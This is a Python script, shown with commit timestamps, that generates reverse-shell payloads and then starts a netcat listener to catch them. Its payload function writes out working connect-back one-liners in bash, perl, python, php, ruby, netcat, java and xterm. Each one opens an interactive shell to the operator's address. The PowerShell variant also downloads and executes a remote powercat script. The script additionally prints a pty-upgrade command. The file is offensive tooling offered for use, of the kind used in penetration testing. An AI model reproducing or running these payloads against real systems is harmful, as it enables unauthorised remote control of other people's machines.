2020-01-28 22:15:42 +01:00
|
|
|
#!/usr/bin/python
|
|
|
|
|
|
|
|
import socket
|
|
|
|
import sys
|
|
|
|
import subprocess
|
2020-06-02 14:15:03 +02:00
|
|
|
import util
|
2020-01-28 22:15:42 +01:00
|
|
|
|
|
|
|
def generatePayload(type, local_address, port):
|
|
|
|
|
|
|
|
if type == "bash":
|
|
|
|
return "bash -i >& /dev/tcp/%s/%d 0>&1" % (local_address, port)
|
|
|
|
elif type == "perl":
|
|
|
|
return "perl -e 'use Socket;$i=\"%s\";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};'" % (local_address, port)
|
|
|
|
elif type == "python" or type == "python2" or type == "python3":
|
|
|
|
binary = type
|
|
|
|
return "%s -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'" % (binary, local_address, port)
|
|
|
|
elif type == "php":
|
|
|
|
return "php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" % (local_address, port)
|
|
|
|
elif type == "ruby":
|
|
|
|
return "ruby -rsocket -e'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/bash -i <&%d >&%d 2>&%d\",f,f,f)'" % (local_address, port)
|
2020-02-06 21:17:45 +01:00
|
|
|
elif type == "netcat" or type == "nc":
|
2020-01-28 22:15:42 +01:00
|
|
|
return "nc -e /bin/bash %s %d\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc %s %d >/tmp/f" % (local_address, port, local_address, port)
|
|
|
|
elif type == "java":
|
|
|
|
return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port)
|
|
|
|
elif type == "xterm":
|
|
|
|
return "xterm -display %s:1" % (local_address)
|
2020-04-09 10:36:28 +02:00
|
|
|
elif type == "powercat" or type == "powershell":
|
2020-04-09 16:06:08 +02:00
|
|
|
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
|
2020-01-28 22:15:42 +01:00
|
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
|
|
2020-06-02 14:15:03 +02:00
|
|
|
if len(sys.argv) < 2:
|
|
|
|
print("Usage: %s <type> [port]" % sys.argv[0])
|
2020-01-28 22:15:42 +01:00
|
|
|
exit(1)
|
|
|
|
|
2020-06-02 14:15:03 +02:00
|
|
|
listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
|
2020-01-28 22:15:42 +01:00
|
|
|
payload_type = sys.argv[1].lower()
|
|
|
|
|
2020-06-02 14:15:03 +02:00
|
|
|
local_address = util.getAddress()
|
|
|
|
|
|
|
|
# choose random port
|
|
|
|
if listen_port is None:
|
|
|
|
sock = util.openServer(local_address)
|
|
|
|
if not sock:
|
|
|
|
exit(1)
|
|
|
|
listen_port = sock.getsockname()[1]
|
|
|
|
sock.close()
|
|
|
|
|
2020-01-28 22:15:42 +01:00
|
|
|
payload = generatePayload(payload_type, local_address, listen_port)
|
|
|
|
|
|
|
|
if payload is None:
|
|
|
|
print("Unknown payload type: %s" % payload_type)
|
2020-04-09 10:36:28 +02:00
|
|
|
print("Supported types: bash, perl, python[2|3], php, ruby, netcat|nc, java, xterm, powershell")
|
2020-01-28 22:15:42 +01:00
|
|
|
exit(1)
|
|
|
|
|
2020-02-06 23:27:29 +01:00
|
|
|
tty = "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
|
2020-02-06 21:17:45 +01:00
|
|
|
print("---PAYLOAD---\n%s\n---TTY---\n%s\n---------\n" % (payload, tty))
|
2020-01-28 22:15:42 +01:00
|
|
|
|
|
|
|
if payload_type == "xterm":
|
|
|
|
print("You need to run the following commands (not tested):")
|
|
|
|
print("xhost +targetip")
|
|
|
|
print("Xnest :1")
|
|
|
|
else:
|
|
|
|
subprocess.call(["nc", "-lvvp", str(listen_port)])
|